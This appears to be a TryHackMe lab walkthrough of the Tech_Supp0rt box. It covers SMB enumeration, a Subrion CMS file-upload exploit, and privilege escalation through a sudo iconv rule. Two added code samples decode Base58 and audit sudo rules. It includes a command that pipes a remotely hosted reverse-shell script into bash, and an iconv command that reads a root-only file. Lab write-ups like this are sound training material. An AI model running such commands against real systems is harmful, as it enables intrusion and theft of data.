Tech_Supp0rt TryHackMe Walkthrough
Introduction
Hello guys, back again with another walkthrough. This time we are going to be tackling Tech_Supp0rt: 1 from TryHackMe. The box tells the story of how a scammer’s server got hacked due to some unpatched vulnerabilities. It’s a really amazing easy box, good for beginners, and it teaches the importance of enumeration.
You start off by finding a web server whose root page is just the default Apache web page, and by performing some directory brute forcing you find endpoints running websites like WordPress and an odd scammer’s webpage. You don’t have access to WordPress, and it turns out to be a dead end, but looking at the nmap scan performed initially you discover that SMB is listening on port 445 and that the scammers left a note containing an endpoint for a CMS called Subrion and some encoded credentials. On visiting the endpoint and looking at the responses returned by the backend server, we can see that the server has a redirect loop, but through the note we get from the SMB share we find a way to bypass it. We then use CyberChef to decode the encoded credentials and log in to the CMS as an admin user, then use an insecure file upload vulnerability to gain a shell on the system. After that we escalate our privileges to the second user with credentials from wp-config.php and use iconv to get the root flag from the system. It was a fun box, and without much more to say, let’s jump in.
As always, we start off with an nmap scan of the box to find the ports that are open, and looking at the screenshot below we have 3 ports open, namely:
- SSH (Secure shell)
- HTTP (web server)
- Netbios-ssn (port 139)
- SMB (Samba share)
The SSH version seems to be secure, though the OS running is Ubuntu Bionic, meaning we cannot exploit SSH, and we do not have credentials to log in to the system via SSH. This means that we’ll probably have to enumerate the service last. I started by enumerating HTTP. Opening the website, I found out it was the default Ubuntu web page.
Looking at the source code by pressing Ctrl + U, I did not find any hidden content on the root page. I decided to run gobuster, a tool written in Go that is used to perform directory brute forcing, and found two endpoints:
- Wordpress
- Test
WordPress seemed more interesting, and I visited the endpoint using a web browser. Looking at the screenshot below, we get a standard WordPress site.
I ran wpscan against the WordPress site to see if I could get some quick wins like core vulnerabilities that WordPress might have, but all the vulnerabilities identified seemed a bit far-fetched for an easy box.
While the enumeration was still running, I decided to look at the test endpoint and see if I could find anything interesting, but I found a typical scamming page.
It was an entirely static site with nothing important to enumerate. I had hit another dead end. I decided to go back to the nmap results, and there was an SMB port listening. If by any chance it accepts null authentication, we might get some sensitive files from the share. To test for null authentication I used CrackMapExec. CrackMapExec is a Swiss army knife for pentesting Windows/Active Directory environments. It is used for everything from enumerating logged-on users and spidering SMB shares to executing psexec-style attacks, auto-injecting Mimikatz/Shellcode/DLLs into memory using PowerShell, and dumping the NTDS.dit. Looking at the screenshot below, we find out that there’s a share called websrv.
I used smbclient to log in to SMB, and there was a file called enter.txt. I downloaded the file to my box.
I closed the SMB share. Since port 139 was open, I decided to run enum4linux. Someone might get lucky and be able to dump the list of users who are onboarded on the server.
While enum4linux was running in the background, I decided to look at the file I had downloaded from the SMB share, and looking at the screenshot below we have a newly discovered endpoint and the credential for the admin user.
On trying to access the /subrion endpoint, we get a failed to connect error from the web server. I decided to intercept the request using Burp Suite to see exactly what the actual problem was. Looking at the screenshot from Burp Suite, we see that the endpoint URL is invalid.
And this causes the failed to connect error message that we receive from Burp Suite.
If I tried to access the index.php file, I got infinite redirects, even if I changed the server IP address in the Burp Suite response, but when I access a file that I know exists I get a 200 OK.
You might be asking how I knew that robots.txt existed on the server; a little GitHub searching would do the trick.
Looking at the disallowed entries in robots.txt, we see /panel. Also, going back to the enter.txt file left on the SMB server, we see that there was a comment of edit from panel. I tried to access /subrion/panel/ and to my surprise it worked: I got a login page.
Also, we know the exact version of the CMS is version 4.2.1; this is seen from the login page.
Remember we had some credentials in the enter.txt from the SMB share. I tried to use those credentials as they were, but I got an authentication error on the CMS.
My first thought was that maybe the password was encoded. I used CyberChef and the magic function to try and decrypt it. Looking at the screenshot below, when we use base58 to try and decode the password we get a success.
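The decoding step above, reproduced outside CyberChef as an added example (not part of the original walkthrough): a Base58 decoder using the Bitcoin alphabet, which is an assumption since the page does not say which alphabet was used. The sample value is constructed and is not the credential from enter.txt.

```python
# Added example: Base58 (Bitcoin alphabet) decoder for inspecting an encoded value.
ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
INDEX = {ch: i for i, ch in enumerate(ALPHABET)}


def b58encode(data: bytes) -> str:
    """Encode bytes as Base58; used here only to build the constructed sample."""
    n = int.from_bytes(data, "big")
    out = ""
    while n:
        n, rem = divmod(n, 58)
        out = ALPHABET[rem] + out
    # Each leading zero byte is represented by a leading '1'.
    pad = len(data) - len(data.lstrip(b"\x00"))
    return "1" * pad + out


def b58decode(text: str) -> bytes:
    """Decode Base58 text, rejecting characters outside the alphabet."""
    n = 0
    for ch in text:
        if ch not in INDEX:
            raise ValueError(f"not Base58: {ch!r}")
        n = n * 58 + INDEX[ch]
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    pad = len(text) - len(text.lstrip("1"))
    return b"\x00" * pad + body


def decode_if_printable(text: str):
    """Return the decoded string if text is Base58 for printable ASCII, else None."""
    try:
        raw = b58decode(text.strip())
    except ValueError:
        return None
    if raw and all(32 <= b < 127 for b in raw):
        return raw.decode("ascii")
    return None


if __name__ == "__main__":
    sample = b58encode(b"Constructed-Passw0rd!")  # constructed value, not from the box
    print(sample, "->", decode_if_printable(sample))
    print(decode_if_printable("0OIl"))  # characters Base58 excludes, so None
```

Anyone who can read the note can reverse the encoding without a key, so an encoded password in a readable share is as exposed as a plaintext one.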
I tried to use the username admin with the decoded password to log in to the CMS and see if I could get access to the admin page, and funnily enough it worked.
Next I decided to go to searchsploit and see if I could find a CVE for this specific version of Subrion CMS, and I found it had an authenticated insecure file upload vulnerability that leads to remote code execution.
I mirrored the exploit back to my current working directory and ran it using the decrypted credentials, and I got remote code execution on the web server.
The next step was to get a shell on the box. I wrote a simple bash reverse shell and hosted it on my box using a Python web server.
Next I downloaded the script to the scammers’ machine and executed it through bash using the command:
curl 10.8.2.58:8000/shell.sh | bash
Looking at the screenshot below, I had a shell on the box.
Next I upgraded my shell and decided to look around, trying to find a way of escalating my privileges.
I remembered there was a WordPress site and it contains a wp-config file. I hunted it down and got the password.
And the server has only two users, namely:
- root
- scamsite
Looking back through enum4linux, it was able to identify scamsite as a local user.
Next I tried to use the wp-config.php credentials as the password for scamsite, and to my surprise it worked!
Next we have to escalate our privileges to the root user. Running sudo -l, we see that we can run iconv as any user on the server without knowing their password.
Using GTFOBins, we find a way to read files.
First I tried reading the root flag using the command below:
sudo -u root iconv -f 8859_1 -t 8859_1 "/root/root.txt"
And looking at the screenshot below, it worked.
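An added example, not from the original walkthrough, of how a defender could catch this misconfiguration: it parses `sudo -l` output and flags rules that grant binaries GTFOBins documents as file readers. The listing, host name and binary paths are constructed for illustration, and the binary set is a small sample rather than a full list.

```python
import os
import re

# Small sample of binaries GTFOBins documents as able to read files; not exhaustive.
FILE_READ_BINARIES = {"iconv", "cat", "base64", "dd", "less", "tail"}

# Matches rule lines such as "    (ALL) NOPASSWD: /usr/bin/iconv, /bin/ls"
RULE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>/.*)$"
)

# Constructed `sudo -l` output modelled on the rule described in the walkthrough.
SAMPLE_LISTING = """\
User scamsite may run the following commands on example-host:
    (ALL) NOPASSWD: /usr/bin/iconv
    (root) /usr/bin/systemctl status apache2
"""


def audit_sudo_listing(listing: str) -> list:
    """Return one finding per sudo rule that grants a file-read-capable binary."""
    findings = []
    for line in listing.splitlines():
        match = RULE.match(line)
        if not match:
            continue  # header lines and non-path rules such as "(ALL : ALL) ALL"
        runas = match.group("runas").strip()
        nopasswd = "NOPASSWD:" in match.group("tags")
        # Passwordless access as a privileged target user is the worst case.
        privileged = runas.split(":")[0].strip() in ("ALL", "root")
        for command in match.group("cmds").split(","):
            parts = command.split()
            if parts and os.path.basename(parts[0]) in FILE_READ_BINARIES:
                findings.append({
                    "path": parts[0],
                    "runas": runas,
                    "nopasswd": nopasswd,
                    "severity": "high" if nopasswd and privileged else "medium",
                })
    return findings


if __name__ == "__main__":
    for finding in audit_sudo_listing(SAMPLE_LISTING):
        print(finding)
```

A flagged rule means the sudo user can read any file the target user can, so the rule should be removed or replaced with a wrapper that fixes the input and output paths.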
I decided to check the .ssh directory to see if any private key was left behind, and I found the root user’s SSH private key.
I didn’t try to log in since I had already gotten the root flag and the box is done. Hope you enjoyed the walkthrough. If so, clap for me down below and follow me so that you won’t miss any upcoming walkthroughs.